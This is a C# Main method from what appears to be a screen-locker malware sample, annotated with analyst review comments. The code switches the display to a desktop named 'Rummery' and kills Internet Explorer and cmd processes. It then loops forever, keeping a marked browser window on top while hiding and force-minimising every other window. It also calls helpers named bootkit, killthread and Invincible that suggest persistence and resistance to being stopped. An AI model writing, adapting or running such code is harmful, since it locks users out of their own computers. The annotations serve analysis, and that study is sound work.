Beispiel #1
        /// <summary>
        /// Program entry point. Runs a series of setup helpers and background threads
        /// (all defined outside this listing), moves the display onto a separate desktop
        /// named "Rummery", prints a banner, then loops forever every two seconds keeping
        /// one Internet Explorer window in front and hiding/minimising everything else.
        /// </summary>
        /// <remarks>
        /// NOTE(review): this reads as a screen-locker style nuisance/malware sample.
        /// Strings visible here that an analyst can search for: the desktop name "Rummery",
        /// the window-title markers "police-polecat-13066" and "Mess with the best", the
        /// console title prefix "SALAMANDERS! ", and the command line "iexplore.exe -nomerge ...".
        /// What the helper methods actually do cannot be confirmed from this listing.
        /// </remarks>
        /// <param name="args">Command-line arguments; not read anywhere in this method.</param>
        static void Main(string[] args)
        {
            // Helpers below are defined elsewhere; their names are the only evidence of intent here.
            // NOTE(review): fork/killthread/bootkit/Invincible suggest persistence and
            // anti-termination behaviour - confirm against their bodies before relying on this.
            fork();
            //unlink_psexec();
            new Thread(killthread).Start();
            bootkit();
            //bsod();
            External.Invincible();
            whatTemp();
            populateImages();
            // Five more worker threads are started; the drawing-related names are not verifiable from here.
            new Thread(bkthread).Start();
            new Thread(drawOnWindows).Start();
            new Thread(drawall).Start();
            new Thread(sdraws).Start();
            new Thread(sdrawthread).Start();

            setDesktop();

            // Try to open an existing desktop object called "Rummery" with GENERIC_ALL access.
            // NOTE(review): External presumably holds P/Invoke declarations for the user32
            // functions of the same names - the declarations are not visible here.
            var ptr = External.OpenDesktop("Rummery", 0, false, (uint)DESKTOP_ACCESS.GENERIC_ALL);

            // A zero handle is treated as "does not exist yet", so the desktop is created instead.
            if (ptr == IntPtr.Zero)
            {
                ptr = External.CreateDesktop("Rummery", IntPtr.Zero, IntPtr.Zero, 0, (uint)DESKTOP_ACCESS.GENERIC_ALL, IntPtr.Zero);
            }
            // Make that desktop the one shown to the user; the result of the call is not checked.
            External.SwitchDesktop(ptr);
            forceNavigate();
            spawnLockIE("Winlogon");
            //spawnLockIE("Rummery");
            setIETitle();
            //External.LockWorkStation();
            // Print a green ASCII-art banner (verbatim string, so whitespace is significant).
            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write(
                @"                                RUMMERY!!
            .           .   ________________    .        .
                  .    ____/ (  (    )   )  \___
            .         /( (  (  )   _    ))  )   )\        .   .
                    ((     (   )(    )  )   (   )  )   .
         .    .   ((/  ( _(   )   (   _) ) (  () )  )_       .   .
                 (( f)  u ( c  k ( 2) h  )e  )c.t)o(r )_
      #####  ####   ### ###  ###### ( _)    ####  #    # ###### #####
     #      #    # #   #   # #       )     #    # #    # #      #    #
    #  ### ###### #   #   # ######  ) (   #    # #    # ###### #####  
   #    # #    # #   #   # #        ( _  #    #  #  #  #      #   #   
   ##### #    # #   #   # ######  _  )   ####     #   ###### #     #  `   
  .       .     (_((__(_(__(( ( ( |  ) ) ) )_))__))_)___)   .
      .         ((__)        \\||lll|l||///          \_))       .
               .       . / (  |(||(|)|||//  \     .    .      .      .
 .       .           .   (   /(/ (  )  ) )\          .     .
     .      .    .     (  . ( ( ( | | ) ) )\   )               .
                        (   /(| / ( )) ) ) )) )    .   .  .       .  .  .
 .     .       .  .   (  .  ( ((((_(|)_)))))     )            .
         .  .          (    . ||\(|(|)|/|| . . )        .        .
     .           .   (   .    |(||(||)||||   .    ) .      .         .  .
 .      .      .       (     //|/l|||)|\\ \     )      .      .   .
                     (/ / //  /|//||||\\  \ \  \ _)
           Interpreting docs with malicious intent since '11");
            Console.WriteLine();
            // Build "user@machine: os-version" from the current Windows identity, the machine
            // name and the OS version string (with the "Microsoft Windows " prefix stripped).
            var ident = System.Security.Principal.WindowsIdentity.GetCurrent().Name + "@" +
                        Environment.MachineName +
                        ": " + Environment.OSVersion.VersionString.Replace("Microsoft Windows ", "");

            // The host identification string ends up in the console window title.
            Console.Title = "SALAMANDERS! " + ident;

            // Terminate every process whose name is exactly "iexplore" or "cmd".
            Process.GetProcesses().Where(
                p => p.ProcessName == "iexplore" || p.ProcessName == "cmd"
                ).ToList().ForEach(
                p => p.Kill()
                );

            //Thread.Sleep(5000);
            // Enforcement loop: never exits, one pass roughly every two seconds (see the Sleep at the end).
            while (true)
            {
                // Fresh snapshot of all processes for this pass.
                var processes = Process.GetProcesses();
                // True when some process is named "iexplore" AND some window title (of any
                // process) contains the marker "police-polecat-13066".
                if (
                    processes.Select(p => p.ProcessName).Contains("iexplore") &&
                    processes.Select(p => p.MainWindowTitle).Any(t => t.Contains("police-polecat-13066"))
                    )
                {
                    //var proc = processes.First(p => p.MainWindowTitle.Contains("police-polecat-13066"));
                    //Program.SetWindowPos(
                    //    proc.MainWindowHandle, new IntPtr(-1), 0, 0, 0, 0, 0x0002 | 0x0001
                    //);
                    // Walk every process and sort its main window into "keep on top" or "hide".
                    foreach (var proc in processes)
                    {
                        if (proc.MainWindowTitle.Contains("police-polecat-13066") || proc.MainWindowTitle.Contains("Mess with the best"))
                        {
                            // Insert-after -1 with position 0,0; flag 0x0001 means the 0x0 size is ignored.
                            // NOTE(review): in the Win32 SetWindowPos API -1 is HWND_TOPMOST and 0x0001 is
                            // SWP_NOSIZE - assumes External.SetWindowPos is a direct wrapper; confirm.
                            External.SetWindowPos(proc.MainWindowHandle, new IntPtr(-1), 0, 0, 0, 0, 0x0001);
                        }
                        else
                        {
                            // Insert-after 1, moved to x=3000, sized 0x0, flag 0x0080.
                            // NOTE(review): in Win32 terms 1 is HWND_BOTTOM and 0x0080 is SWP_HIDEWINDOW,
                            // i.e. every other window is pushed back and hidden - same wrapper assumption.
                            External.SetWindowPos(proc.MainWindowHandle, new IntPtr(1), 3000, 0, 0, 0, 0x0080);
                        }
                    }
                }
                else
                {
                    // No marked IE window found: launch a new maximised Internet Explorer with
                    // "-nomerge" followed by hPath (hPath is defined outside this listing).
                    var pInfo = new ProcessStartInfo(
                        "iexplore.exe", "-nomerge " + hPath
                        );
                    pInfo.WindowStyle = ProcessWindowStyle.Maximized;
                    var p = new Process();
                    p.StartInfo = pInfo;
                    p.Start();
                }
                // For every process that is not iexplore and whose title lacks the marker,
                // call ShowWindow with command 11.
                // NOTE(review): 11 is SW_FORCEMINIMIZE in the Win32 ShowWindow API - assumes a direct wrapper.
                processes.Where(
                    p => !p.MainWindowTitle.Contains("police-polecat-13066") &&
                    p.ProcessName != "iexplore"
                    ).ToList().ForEach(p => External.ShowWindow(p.MainWindowHandle, 11));

                // Re-assert the desktop switch and raise this process's scheduling priority on every pass.
                External.SwitchDesktop(ptr);
                Process.GetCurrentProcess().PriorityClass        = ProcessPriorityClass.High;
                Process.GetCurrentProcess().PriorityBoostEnabled = true;
                // Same helper sequence as before the loop, repeated each pass.
                forceNavigate();
                spawnLockIE("Winlogon");
                //spawnLockIE("Rummery");
                setIETitle();
                setDesktop();
                // Pause two seconds before the next pass.
                Thread.Sleep(2000);
            }
        }